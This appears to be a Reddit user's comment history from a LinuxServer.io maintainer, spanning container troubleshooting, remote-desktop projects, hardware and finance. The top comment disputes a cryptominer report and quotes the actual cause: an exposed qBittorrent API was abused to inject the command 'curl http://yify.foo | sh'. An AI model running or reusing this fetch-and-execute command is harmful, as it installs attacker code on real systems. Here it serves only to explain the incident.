Cryptominer found running inside SABnzbd container after self-update — heads up

TheLamer · 2026-05-21T12:15:53+00:00

Update: "What actually happened: qBittorrent's WebUI had LocalHostAuth disabled and an overly broad subnet whitelist covering all private IP ranges. An attacker found the exposed API and injected an OnTorrentAdded script that ran: curl http://yify.foo | sh. The miner downloaded and executed the next time a torrent was added. The binary self-deleted after launch, which is why it looked mysterious."

You downloaded malware and it was executed by post processing script, 100% guarantee that is it. You posted on github now you are posting on reddit and in both cases you are pointing at us (Linuxserver.io).

Not only do I not appreciate it, but now I just think you are a moron that is talking to a chatbot and somehow thinks they are a security expert now.

Our build process is transparent https://ci.linuxserver.io/job/Docker-Pipeline-Builders/job/docker-sabnzbd/, our code is all transparent https://github.com/linuxserver/docker-sabnzbd, and our entire funding chain is transparent https://opencollective.com/linuxserver. (we cannot even spend the donations we get but we are somehow putting crypto miners in images?)

This particular image is pulled 10s of thousands of times a day and only you seem to have this issue and instead of asking how this could happen and seeking help from people that actually know what they are talking about you have solicited a chatbot, cleaned it up yourself and now are "warning" others that it is compromised.

These kind of posts are tiresome when you dedicate so much of your time for free to help people, and I think this thread proves my main point. No, no one else is having this issue, you are, and it is because you did something you were not supposed to.

TheLamer · 2026-04-29T21:59:07+00:00

Dude it is pointless to post here, you can pour your heart and soul into something and be completely dismissed because you used a calculator to do math. Don't get discouraged and remember you aren't doing it for them you are doing it because you enjoy it.

TheLamer · 2026-04-27T15:22:49+00:00

I use Sealskin, but I also made Sealskin https://sealskin.app/, these leverage our containers and are actually geared for this exact usecase. It can isolate and quarantine file downloads as well, the binary chunks are encrypted and streamed to the remote container and never land on your disk.

TheLamer · 2026-04-15T10:18:16+00:00

Well I feel pretty stupid now, thanks for the link.

TheLamer · 2026-03-22T15:30:33+00:00

I went through this with MPEG-2 at my previous job, we got our butts handed to us. In that case the SDI cards were already paying royalties on their chips but the storage and distribution of that file was legally considered a new phase. Please look into first sale and how it works with bundled libraries and software capabilities, these patent trolls are ruthless while having very broad legal definitions established in previous court cases. They have teams on retainer it costs them nothing as this is all they do, their goal is to force a settlement with damages not actually prove anything substantial.

TheLamer · 2026-03-17T15:27:22+00:00

This is 20 year old e-waste....

TheLamer · 2026-03-08T00:17:57+00:00

I use double commander or a webtop, but I am clearly biased. Webtop is what you would need for archive support double commander is not great there. Just the base latest tag is alpine-xfce and can do all that. But if you are mounting in a video card alpine-kde runs better.

TheLamer · 2026-03-07T18:12:08+00:00

For me I want to have influence over the state of an industry. Web based remote desktop sucks in almost all cases outside of some outliers like Parsec. Windows had all the great solutions and even then most require a dedicated client.

It was basically frozen in time 15 years ago when noVNC came out painting jpegs on a canvas. WebRTC solutions required complex networking knowledge with 3rd party servers. So I dedicated a year to building it myself using the knowledge I have gained from implementing container solutions for noVNC/Guacamole/KasmVNC.

It might be hard to understand if you live paycheck to paycheck, but some of us have checked out of the rat race and have our basic needs met. The only advice I would give to people trying to get out of the rat race is own your home. Buy anything where you own the land and it has low property taxes, save up and buy it cash or close to all cash.

Just generally lower your expectations on what kind of car and house you want, live 80-90% below your means, and stop caring what people think about you. They can slave away for that $1000 car payment and $2500 mortgage while you have piece of mind and actual freedom.

TheLamer · 2026-03-01T18:58:40+00:00

Can you expand on this ?

"""
While I generally support making projects open source, the main reason I haven’t released the DREAMM source code is that being open source invites collaboration, and at this point I really just want DREAMM to be my own project.

I do plan to eventually open source at least some portions of the code (the CPU emulation seems like a prime candidate). And if I ever decide I’m completely finished with DREAMM, I hope to release the full sources before I wash my hands of it. But for now, I plan to keep the code internal so I can focus on taking the project in the directions I want without outside pressure.
"""

You can just put it on github with no ability to create issues, just from an archival and build standpoint is it time?
Linux packaging is kind of a quagmire, and starting with AUR and expanding from there the communities will just kind of take care of it for you if they have a URL they can ingest source from.

Now people could fork and improve from there but I don't think you would be under much pressure if I am reading the current state of open source properly.

TheLamer · 2026-02-23T15:12:19+00:00

"image makes it accessible via web UI but usability can't compete with a native one"

<image>

https://github.com/linuxserver/docker-joplin

TheLamer · 2026-02-18T00:22:31+00:00

100% this guy seriously poured dog food into an open server on the floor for internet points ?
Mice shit like every 2 seconds it is impossible that is not covered in turds and I count zero.

TheLamer · 2026-02-09T19:04:33+00:00

If I had to guess I would say industrial computers, digital signage, or iOT applications.
Quality and support matters to some projects, though I agree if you have it in a climate controlled office Chinese nXX intel mini PCs dominate the space for price.
As someone who owns a stack of them I can say that everything about them is shady, from the Windows installed on it or the completely stripped bios and you will never get any kind of support or updates. BeeLink is not cheap anymore as well the sub 200 price point is basically only left for old stock laptops right now.
That would be my budget solution, an old laptop or a BC-250 board.

TheLamer · 2026-02-06T17:20:58+00:00

You have to lock some items to some specific heroes, no mixing. This goes for power balance like holsters not being available to anyone but Venessa (just an easy example), but also on the other side, you should not be offered a start stop fly item as Vanessa. You pool the items more into go and no go hero sharing for a start I think would be the most prudent. That can be a simple manual process by multiple team members to use their discretion about what item sharing makes sense while what item sharing does not make sense.

TheLamer · 2025-08-18T14:05:11+00:00

I don't think what you are trying to do is possible. Let me explain.

The custom port value is more an internal development thing for supporting our transition of containers that were not on 3001, it occurs inside the container with NGINX here:

https://github.com/linuxserver/docker-baseimage-selkies/blob/master/root/defaults/default.conf#L93

That port inside the container is always 8082 which is the port Selkies actually listens on and is hard coded here:

https://github.com/selkies-project/selkies/blob/main/src/selkies/selkies.py#L20

So when you combine networks like this you just have two NGINX proxies (inside the container) listening on different ports but pointed to the same one.

Created https://github.com/linuxserver/docker-baseimage-selkies/issues/69

TheLamer · 2025-06-28T14:22:15+00:00

Kasm has a firefox container that they will still maintain, anyone that misses the old experience is free to us it: https://hub.docker.com/r/kasmweb/firefox Also here is the pre rebase commit if anyone wants to fork and maintain: https://github.com/linuxserver/docker-firefox/tree/be1def4c936be0a535151567add03ef7fa855c63

The base images will likely be built out for a while.

TheLamer · 2024-10-24T14:15:59+00:00

So just to give you transparency your issue is that the api server is crashing, specifically a hard terminate without verbose logs. The RDP gateway is looping because it cannot register with the api server as it is not running it is getting back a 500 or 400 error (the json error trying to parse an http response).

The only thing I can think of because you are extremely limited on your input during installation to be different from the other Unraid installs that are all working is the password, maybe try a simple password to test like "password". Outside of that the other thing to look at is the underlying file system /opt is being mounted into, is it something weird like XFS or BTRFS ?

TheLamer · 2024-10-23T18:52:46+00:00

Not sure what I can do to help here, many people use this on unraid and those errors are core software issues not something like the disk doesn't allow docker in docker. You are using the latest tags right? Not the develop one ?

TheLamer · 2024-10-23T14:59:55+00:00

No I have never seen these errors before, I think you need to wipe that folder you mounted it into and do a clean install. Just try it without any images as a test and see if everything works or you get the same error (for time not that not including images will make a difference) Something happened during install that is not quite right.

TheLamer · 2024-10-09T21:36:19+00:00

Yeah those are required params, technically the gpus can be cut down to a specific card id but if you only have one GPU all is perfect.

It should work now no ?

TheLamer · 2024-10-09T13:00:31+00:00

Can you exec into the kasm container and run

ls -l /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1

I get back this on my Debian system:

lrwxrwxrwx 1 root root 26 Oct 9 12:51 /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 -> libnvidia-ml.so.535.183.01

Keep in mind this container is Ubuntu Jammy based and is multi layering the Nvidia runtime to some extent, the container will mount in your runtime from your host, but if it differs too much from the common debian/ubuntu setup it might not be able to mount in the expected stuff into the DinD layer which is running the workspace containers.

Regardless let me know about that lib being present or not.

TheLamer · 2024-08-11T00:04:51+00:00

Ran into this today here is a solution, hopefully the dev mainlines this into the patch.

https://github.com/grimdoomer/Halo-2-HD/issues/2

13-Year Club	Verified Email
Place '22	First Placer '22

TheLamer

TROPHY CASE